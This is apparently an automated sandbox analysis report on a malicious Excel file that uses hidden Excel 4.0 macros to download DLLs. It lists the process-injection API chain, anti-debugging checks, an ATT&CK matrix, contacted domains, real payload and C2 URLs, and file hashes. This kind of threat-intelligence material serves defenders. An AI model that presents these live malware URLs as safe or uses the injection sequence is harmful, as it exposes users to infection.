    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ubc\way.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2864Thread sleep time: -240000s >= -30000s
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00352EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00420D28 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00420C5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00420865 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E2EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: case (4335).xls, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: msiexec.exe, 00000005.00000002.2356165032.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: msiexec.exe, 00000005.00000002.2356165032.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: msiexec.exe, 00000005.00000002.2356165032.0000000000A30000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040968A cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004095A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00341A00 CreateDialogParamW,GetVersion,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting4Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting4Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery35Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.rundll32.exe.340000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
    5.2.msiexec.exe.d0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://gadgetswolf.com/post.phpMb0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    https://gadgetswolf.com/0%Avira URL Cloudsafe
    https://rnollg.com/kev/scfrd.dll0%Avira URL Cloudsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://gadgetswolf.com/f0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://gadgetswolf.com/post.phpab0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~0%Avira URL Cloudsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll$80%Avira URL Cloudsafe
    https://homesoapmolds.com/0%Avira URL Cloudsafe
    https://govemedico.tk/post.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    homesoapmolds.com
    104.21.60.169
    truefalse
      unknown
      rnollg.com
      172.67.150.228
      truefalse
        unknown
        gadgetswolf.com
        172.67.200.147
        truefalse
          unknown
          govemedico.tk
          104.21.73.69
          truefalse
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0FDE0000.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.comrundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                  high
                  http://crl.entrust.net/server1.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    high
                    http://ocsp.entrust.net03msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://gadgetswolf.com/post.phpMbmsiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://gadgetswolf.com/msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://rnollg.com/kev/scfrd.dllbefore.1.0.0.sheet.csv_unpacktrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                      high
                      https://gadgetswolf.com/fmsiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://gadgetswolf.com/post.phpabmsiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.msiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                            high
                            http://www.%s.comPAmsiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~case (4335).xlsfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net0Dmsiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rnollg.com/kev/scfrd.dll$8case (4335).xls, 0FDE0000.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                              high
                              https://homesoapmolds.com/msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                                high
                                https://govemedico.tk/post.phpmsiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                172.67.150.228
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                104.21.60.169
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                172.67.200.147
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                104.21.73.69
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse

                                General Information

                                Joe Sandbox Version:31.0.0 Emerald
                                Analysis ID:344665
                                Start date:26.01.2021
                                Start time:21:34:07
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 8s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:case (4335).xls
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.expl.evad.winXLS@7/12@4/4
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 67.8% (good quality ratio 67.4%)
                                • Quality average: 89.5%
                                • Quality standard deviation: 19.2%
                                HCA Information:
                                • Successful, ratio: 83%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xls
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • TCP Packets have been reduced to 100
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344665/sample/case (4335).xls

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                21:35:12API Interceptor1205x Sleep call for process: msiexec.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                172.67.150.228case (1522).xlsGet hashmaliciousBrowse
                                  case (166).xlsGet hashmaliciousBrowse
                                    104.21.60.169case (1522).xlsGet hashmaliciousBrowse
                                      case (4374).xlsGet hashmaliciousBrowse
                                        172.67.200.147case (1522).xlsGet hashmaliciousBrowse
                                          104.21.73.69case (1522).xlsGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            gadgetswolf.comcase (1522).xlsGet hashmaliciousBrowse
                                            • 172.67.200.147
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.44.135
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 104.21.44.135
                                            rnollg.comcase (1522).xlsGet hashmaliciousBrowse
                                            • 172.67.150.228
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.150.228
                                            govemedico.tkcase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 172.67.158.184
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.158.184
                                            homesoapmolds.comcase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            CLOUDFLARENETUScase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.19.94
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            Informacion.docGet hashmaliciousBrowse
                                            • 104.21.89.78
                                            PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            a4iz7zkilq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            nMn5eAMhBy.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            vK6VPijMoq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8gom3VEZLS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            v07PSzmSp9.exeGet hashmaliciousBrowse
                                            • 66.235.200.145
                                            CLOUDFLARENETUScase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.19.94
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            Informacion.docGet hashmaliciousBrowse
                                            • 104.21.89.78
                                            PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            a4iz7zkilq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            nMn5eAMhBy.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            vK6VPijMoq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8gom3VEZLS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            v07PSzmSp9.exeGet hashmaliciousBrowse
                                            • 66.235.200.145
                                            CLOUDFLARENETUScase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.19.94
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            Informacion.docGet hashmaliciousBrowse
                                            • 104.21.89.78
                                            PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            a4iz7zkilq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            nMn5eAMhBy.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            vK6VPijMoq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8gom3VEZLS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            v07PSzmSp9.exeGet hashmaliciousBrowse
                                            • 66.235.200.145

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            7dcce5b76c8b17472d024758970a406bcase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            The Mental Health Center.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (348).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (426).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (250).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (1447).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (850).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (1543).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case_1581.xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (435).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\ProgramData\formnet.dllcase (1522).xlsGet hashmaliciousBrowse
                                              case (4374).xlsGet hashmaliciousBrowse
                                                case (166).xlsGet hashmaliciousBrowse
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllcase (1522).xlsGet hashmaliciousBrowse
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                      case (166).xlsGet hashmaliciousBrowse
                                                        C:\Users\user\AppData\Roaming\Ubc\way.dllcase (1522).xlsGet hashmaliciousBrowse
                                                          case (4374).xlsGet hashmaliciousBrowse
                                                            case (166).xlsGet hashmaliciousBrowse

                                                              Created / dropped Files

                                                              C:\ProgramData\formnet.dll
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):933888
                                                              Entropy (8bit):6.687983171155114
                                                              Encrypted:false
                                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                              Malicious:true
                                                              Joe Sandbox View:
                                                              • Filename: case (1522).xls, Detection: malicious, Browse
                                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                                              • Filename: case (166).xls, Detection: malicious, Browse
                                                              Reputation:low
